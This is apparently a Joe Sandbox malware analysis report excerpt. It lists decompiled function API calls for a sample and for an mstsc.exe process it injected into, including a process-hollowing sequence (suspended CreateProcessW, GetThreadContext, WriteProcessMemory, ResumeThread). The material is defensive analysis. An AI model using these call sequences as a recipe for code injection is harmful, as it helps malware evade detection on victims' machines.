Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00421414, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98

APIs

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
Part of subcall function 00423EB3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00421317,0000000D), ref: 00423EDD

InterlockedDecrement.KERNEL32(?), ref: 004214B2

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3

Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422228
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422235
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422242
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042224F
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042225C
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422278
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(00000000), ref: 00422288
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042229E

Strings

'C, xrefs: 004214BC
p.C, xrefs: 004214FC

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00421414, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 98

APIs

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD

InterlockedDecrement.KERNEL32(?), ref: 004214B2

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3

Strings

'C, xrefs: 004214BC
p.C, xrefs: 004214FC

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0041FDEE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97

APIs

Part of subcall function 0041F790: __fltout2.LIBCMT ref: 0041F7BF

__fltout2.LIBCMT ref: 0041FE19

Part of subcall function 004237BF: ___dtold.LIBCMT ref: 004237E5
Part of subcall function 004237BF: _$I10_OUTPUT.LIBCMT ref: 00423800

Part of subcall function 00423659: _strlen.LIBCMT ref: 004236F4

__cftof2_l.LIBCMT ref: 0041FEA6

Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FC8B
Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FCAF

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Strings

-, xrefs: 0041FE46

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0041FDEE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97

APIs

Part of subcall function 0041F790: __fltout2.LIBCMT ref: 0041F7BF

__fltout2.LIBCMT ref: 0041FE19

Part of subcall function 004237BF: ___dtold.LIBCMT ref: 004237E5

Part of subcall function 00423659: _strlen.LIBCMT ref: 004236F4

__cftof2_l.LIBCMT ref: 0041FEA6

Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FC8B
Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FCAF

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Strings

-, xrefs: 0041FE46

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00427821, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95

APIs

__getptd.LIBCMT ref: 0042784C

Part of subcall function 004213FA: __amsg_exit.LIBCMT ref: 0042140A

Part of subcall function 0042243F: __getptd.LIBCMT ref: 0042244B
Part of subcall function 0042243F: __getptd.LIBCMT ref: 00422462
Part of subcall function 0042243F: __amsg_exit.LIBCMT ref: 00422470

Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD

__copytlocinfo_nolock.LIBCMT ref: 00427890

Strings

p.C, xrefs: 00427909, 00427915

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0041F790, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84

APIs

__fltout2.LIBCMT ref: 0041F7BF

Part of subcall function 004237BF: ___dtold.LIBCMT ref: 004237E5
Part of subcall function 004237BF: _$I10_OUTPUT.LIBCMT ref: 00423800

Part of subcall function 00423659: _strlen.LIBCMT ref: 004236F4

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Strings

-, xrefs: 0041F80A
e+000, xrefs: 0041F6FC

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0041FD10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80

APIs

__fltout2.LIBCMT ref: 0041FD3B

Part of subcall function 004237BF: ___dtold.LIBCMT ref: 004237E5
Part of subcall function 004237BF: _$I10_OUTPUT.LIBCMT ref: 00423800

Part of subcall function 00423659: _strlen.LIBCMT ref: 004236F4

__cftof2_l.LIBCMT ref: 0041FDBA

Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FC8B
Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FCAF

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Strings

-, xrefs: 0041FD93

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0041FD10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80

APIs

__fltout2.LIBCMT ref: 0041FD3B

Part of subcall function 004237BF: ___dtold.LIBCMT ref: 004237E5

Part of subcall function 00423659: _strlen.LIBCMT ref: 004236F4

__cftof2_l.LIBCMT ref: 0041FDBA

Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FC8B
Part of subcall function 0041FC0D: _strlen.LIBCMT ref: 0041FCAF

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32(004344BC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Strings

-, xrefs: 0041FD93

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00426BB6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59

APIs

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
Part of subcall function 00423EB3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00421317,0000000D), ref: 00423EDD

InterlockedDecrement.KERNEL32(00000000), ref: 00426B1F

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,00000000,00423589,00423A0C,00000000,?,0041FFDE,00000000,00010000,00030000,?,0041EF6A), ref: 00424BF3

Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422228
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422235
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422242
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042224F
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042225C
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 00422278
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(00000000), ref: 00422288
Part of subcall function 0042220E: InterlockedDecrement.KERNEL32(?), ref: 0042229E

Strings

p.C, xrefs: 00426B6D
'C, xrefs: 00426B2C

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00426BB6, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59

APIs

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD

InterlockedDecrement.KERNEL32(00000000), ref: 00426B1F

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3

Strings

p.C, xrefs: 00426B6D
'C, xrefs: 00426B2C

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0040B8CA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50

APIs

PathFindFileNameW.SHLWAPI(76E645DF,00000000,76E6FE8D,?,?,?,?,?,?,KCBqiNhR7x,0040F429), ref: 0040B8D9

Part of subcall function 0040E60D: lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0040E625
Part of subcall function 0040E60D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0040E634
Part of subcall function 0040E60D: HeapAlloc.KERNEL32(00000000), ref: 0040E63B
Part of subcall function 0040E60D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0040E654
Part of subcall function 0040E60D: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E66D
Part of subcall function 0040E60D: HeapFree.KERNEL32(00000000), ref: 0040E674

Strings

KCBqiNhR7x, xrefs: 0040B8CA
CacX, xrefs: 0040B905

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00421290, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50

APIs

RtlDecodePointer.NTDLL(004327D8), ref: 004212A1
TlsFree.KERNEL32(004327DC,00421733,?,0041F2CB), ref: 004212BB

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3

Strings

HfC, xrefs: 00423D75, 00423D9F

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0041E850, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43

APIs

GetCurrentThread.KERNEL32 ref: 0041E893
GetVersionExA.KERNEL32(?), ref: 0041E8A0

Strings

g, xrefs: 0041E881

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 004047D4, Relevance: 5.0, APIs: 4, Instructions: 39

APIs

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,76E6C570,0040D305,00000000,?,00000000,00000000), ref: 004047F4
HeapFree.KERNEL32(00000000), ref: 004047F7
GetProcessHeap.KERNEL32(00000008,?,?,00000000,76E6C570,0040D305,00000000,?,00000000,00000000), ref: 00404801
HeapAlloc.KERNEL32(00000000), ref: 00404804

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Analysis Process: mstsc.exe PID: 3140 Parent PID: 3076

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.2%
Total number of Nodes:	1524
Total number of Limit Nodes:	14

Executed Functions

Function 0006E0EF, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 175

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00106D80), ref: 0006E140
HeapAlloc.KERNEL32(00000000), ref: 0006E143
GetShellWindow.USER32 ref: 0006E155
GetProcessHeap.KERNEL32(00000008,0000001A), ref: 0006E1BD
HeapAlloc.KERNEL32(00000000), ref: 0006E1C0
ReleaseCapture.USER32 ref: 0006E1D4
LoadLibraryA.KERNEL32(?), ref: 0006E1FE
GetProcAddress.KERNEL32(00000000), ref: 0006E205
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E219
HeapFree.KERNEL32(00000000), ref: 0006E222
GetProcessHeap.KERNEL32(00000000,?), ref: 0006E227
HeapFree.KERNEL32(00000000), ref: 0006E22A
NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,7142434B,?,00000000,00106D80), ref: 0006E240
VirtualAlloc.KERNELBASE(00000000,7142424B,00003000,00000004), ref: 0006E261
NtQuerySystemInformation.NTDLL(00000005,00000000,7142434B,00000000), ref: 0006E276
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0006E2E1

Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,00000010,00000000,?,00000000), ref: 0006752D
Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 00067530
Part of subcall function 000674D8: GetMessageTime.USER32 ref: 00067544
Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0006759E
Part of subcall function 000674D8: HeapAlloc.KERNEL32(00000000), ref: 000675A1
Part of subcall function 000674D8: IsSystemResumeAutomatic.KERNEL32 ref: 000675B5
Part of subcall function 000674D8: GetModuleHandleA.KERNEL32(00000000,?), ref: 000675E6
Part of subcall function 000674D8: GetProcAddress.KERNEL32(00000000), ref: 000675ED
Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00067601
Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 0006760A
Part of subcall function 000674D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0006760F
Part of subcall function 000674D8: HeapFree.KERNEL32(00000000), ref: 00067612
Part of subcall function 000674D8: OpenProcess.KERNEL32(00000400,00000000,?,00000000), ref: 0006762E
Part of subcall function 000674D8: IsWow64Process.KERNELBASE(00000000,00000000), ref: 0006763F
Part of subcall function 000674D8: CloseHandle.KERNEL32(00000000), ref: 0006764D

Part of subcall function 0006E60D: lstrlenW.KERNEL32(?,00000000,00000000,?), ref: 0006E625
Part of subcall function 0006E60D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?), ref: 0006E634
Part of subcall function 0006E60D: HeapAlloc.KERNEL32(00000000), ref: 0006E63B
Part of subcall function 0006E60D: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 0006E654
Part of subcall function 0006E60D: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E66D
Part of subcall function 0006E60D: HeapFree.KERNEL32(00000000), ref: 0006E674

Strings

7mUV, xrefs: 0006E1B2
[##', xrefs: 0006E121

Memory Dump Source

Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_60000_mstsc.jbxd

Function 0006EFB9, Relevance: 119.4, APIs: 44, Strings: 24, Instructions: 363

APIs

SetErrorMode.KERNELBASE(00000000), ref: 0006EFD4
SetErrorMode.KERNELBASE(00000000), ref: 0006EFDA
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006F006
HeapAlloc.KERNEL32(00000000), ref: 0006F009
GetCapture.USER32 ref: 0006F024
GetProcessHeap.KERNEL32(00000008,00000014), ref: 0006F088
HeapAlloc.KERNEL32(00000000), ref: 0006F08B
GetFocus.USER32 ref: 0006F09F
LoadLibraryA.KERNEL32(?), ref: 0006F0C9
GetProcAddress.KERNEL32(00000000), ref: 0006F0D0
GetCommandLineW.KERNEL32 ref: 0006F0D8
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006F0F8
RtlAllocateHeap.NTDLL(00000000), ref: 0006F101
GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0006F11C
GetProcessHeap.KERNEL32(00000008,00000029), ref: 0006F168
HeapAlloc.KERNEL32(00000000), ref: 0006F16B
IsSystemResumeAutomatic.KERNEL32 ref: 0006F17B
GetProcessHeap.KERNEL32(?,00000000), ref: 0006F1A5
GetModuleHandleW.KERNEL32(00000000,?), ref: 0006F1B8

Part of subcall function 00069C2E: GetProcessHeap.KERNEL32(00000008,00000208,?,00000000,76E6FE8D), ref: 00069C4C
Part of subcall function 00069C2E: HeapAlloc.KERNEL32(00000000), ref: 00069C59
Part of subcall function 00069C2E: GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D22
Part of subcall function 00069C2E: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D29
Part of subcall function 00069C2E: GetProcessHeap.KERNEL32(?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D43
Part of subcall function 00069C2E: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069D74
Part of subcall function 00069C2E: lstrcatW.KERNEL32(?,?), ref: 00069D85
Part of subcall function 00069C2E: lstrcatW.KERNEL32(?,00070518), ref: 00069D8D
Part of subcall function 00069C2E: lstrcatW.KERNEL32(?,?), ref: 00069D93
Part of subcall function 00069C2E: lstrcatW.KERNEL32(?,00070520), ref: 00069D9B
Part of subcall function 00069C2E: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069DAA
Part of subcall function 00069C2E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00069DCB
Part of subcall function 00069C2E: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,00000008,?,?,0000005D), ref: 00069DD4
Part of subcall function 00069C2E: HeapFree.KERNEL32(00000000), ref: 00069DDB
Part of subcall function 00069C2E: GetThreadContext.KERNEL32(?,00010002), ref: 00069E05
Part of subcall function 00069C2E: SetLastError.KERNEL32(00000000), ref: 00069FC9
Part of subcall function 00069C2E: ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00069FF4
Part of subcall function 00069C2E: IsBadReadPtr.KERNEL32(EpiTo,00000001), ref: 0006A01C
Part of subcall function 00069C2E: IsBadReadPtr.KERNEL32(?,00000004), ref: 0006A038
Part of subcall function 00069C2E: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0006A068
Part of subcall function 00069C2E: ResumeThread.KERNEL32(?), ref: 0006A07E
Part of subcall function 00069C2E: CloseHandle.KERNEL32(00000000), ref: 0006A0A2
Part of subcall function 00069C2E: TerminateProcess.KERNEL32(?,00000000), ref: 0006A0B5
Part of subcall function 00069C2E: CloseHandle.KERNEL32(?), ref: 0006A0BF
Part of subcall function 00069C2E: CloseHandle.KERNEL32(?), ref: 0006A0C9
Part of subcall function 00069C2E: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A0D6
Part of subcall function 00069C2E: HeapFree.KERNEL32(00000000), ref: 0006A0DD

ExitProcess.KERNEL32 ref: 0006F1C9

Part of subcall function 0006EF8B: VirtualQuery.KERNEL32(0006EF8B,00000000,0000001C,?), ref: 0006EFAB

Part of subcall function 00061C80: LoadLibraryA.KERNEL32(?), ref: 00061CC1
Part of subcall function 00061C80: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00061CE1
Part of subcall function 00061C80: GetModuleHandleExA.KERNEL32(00000001,00000000,?), ref: 00061CF8

Part of subcall function 0006E897: OpenProcessToken.ADVAPI32(00000000,00000008,?,00000000,00000000,00000000,?,0006F1FF), ref: 0006E8A6
Part of subcall function 0006E897: GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,?,?,?,0006F1FF), ref: 0006E8C2
Part of subcall function 0006E897: GetLastError.KERNEL32(?,0006F1FF), ref: 0006E8D0
Part of subcall function 0006E897: GetProcessHeap.KERNEL32(00000008,?,76E6FE8D,?,0006F1FF), ref: 0006E8E1
Part of subcall function 0006E897: HeapAlloc.KERNEL32(00000000,?,0006F1FF), ref: 0006E8E8
Part of subcall function 0006E897: GetTokenInformation.KERNELBASE(?,00000019,00000000,?,?,?,0006F1FF), ref: 0006E901
Part of subcall function 0006E897: GetSidSubAuthorityCount.ADVAPI32(00000000,?,0006F1FF), ref: 0006E90D
Part of subcall function 0006E897: GetSidSubAuthority.ADVAPI32(00000000,?,?,0006F1FF), ref: 0006E924
Part of subcall function 0006E897: GetProcessHeap.KERNEL32(00000000,00000000,?,0006F1FF), ref: 0006E946
Part of subcall function 0006E897: HeapFree.KERNEL32(00000000,?,0006F1FF), ref: 0006E94D
Part of subcall function 0006E897: CloseHandle.KERNEL32(?), ref: 0006E957

GetVersion.KERNEL32 ref: 0006F201
HeapFree.KERNEL32(00000000), ref: 0006F49D

Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000008,00000069,?,00000000,76E6FE8D), ref: 0006A1A4
Part of subcall function 0006A0EE: HeapAlloc.KERNEL32(00000000), ref: 0006A1A7
Part of subcall function 0006A0EE: ReleaseCapture.USER32 ref: 0006A1C2
Part of subcall function 0006A0EE: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0006A1F5
Part of subcall function 0006A0EE: GetShortPathNameW.KERNEL32(?,?,00000104), ref: 0006A206
Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000008,0000003D), ref: 0006A258
Part of subcall function 0006A0EE: HeapAlloc.KERNEL32(00000000), ref: 0006A25B
Part of subcall function 0006A0EE: GetForegroundWindow.USER32 ref: 0006A272
Part of subcall function 0006A0EE: wsprintfW.USER32 ref: 0006A2A6
Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000008,00000019), ref: 0006A2E6
Part of subcall function 0006A0EE: HeapAlloc.KERNEL32(00000000), ref: 0006A2E9
Part of subcall function 0006A0EE: RevertToSelf.ADVAPI32 ref: 0006A300
Part of subcall function 0006A0EE: CoInitializeEx.OLE32(00000000,00000006), ref: 0006A362
Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0006A392
Part of subcall function 0006A0EE: HeapAlloc.KERNEL32(00000000), ref: 0006A395
Part of subcall function 0006A0EE: GetCapture.USER32 ref: 0006A3AC
Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000008,00000011), ref: 0006A40B
Part of subcall function 0006A0EE: HeapAlloc.KERNEL32(00000000), ref: 0006A40E
Part of subcall function 0006A0EE: GetDoubleClickTime.USER32 ref: 0006A422
Part of subcall function 0006A0EE: LoadLibraryA.KERNEL32(57495761), ref: 0006A44C
Part of subcall function 0006A0EE: GetProcAddress.KERNEL32(00000000), ref: 0006A453
Part of subcall function 0006A0EE: GetLastError.KERNEL32 ref: 0006A45D
Part of subcall function 0006A0EE: Sleep.KERNEL32(00000064), ref: 0006A46C
Part of subcall function 0006A0EE: GetForegroundWindow.USER32 ref: 0006A472
Part of subcall function 0006A0EE: CoUninitialize.OLE32 ref: 0006A48B
Part of subcall function 0006A0EE: CloseHandle.KERNEL32(?), ref: 0006A494
Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A4A3
Part of subcall function 0006A0EE: HeapFree.KERNEL32(00000000), ref: 0006A4AC
Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000000,57495761), ref: 0006A4B2
Part of subcall function 0006A0EE: HeapFree.KERNEL32(00000000), ref: 0006A4B5
Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000000,4E5A666B), ref: 0006A4BB
Part of subcall function 0006A0EE: HeapFree.KERNEL32(00000000), ref: 0006A4BE
Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000000,31653832), ref: 0006A4C4
Part of subcall function 0006A0EE: HeapFree.KERNEL32(00000000), ref: 0006A4C7
Part of subcall function 0006A0EE: GetProcessHeap.KERNEL32(00000000,?), ref: 0006A4CD
Part of subcall function 0006A0EE: HeapFree.KERNEL32(00000000), ref: 0006A4D0

GetProcessHeap.KERNEL32(00000000,?), ref: 0006F214
HeapFree.KERNEL32(00000000), ref: 0006F217
GetProcessHeap.KERNEL32(00000008,0000009D), ref: 0006F2D1
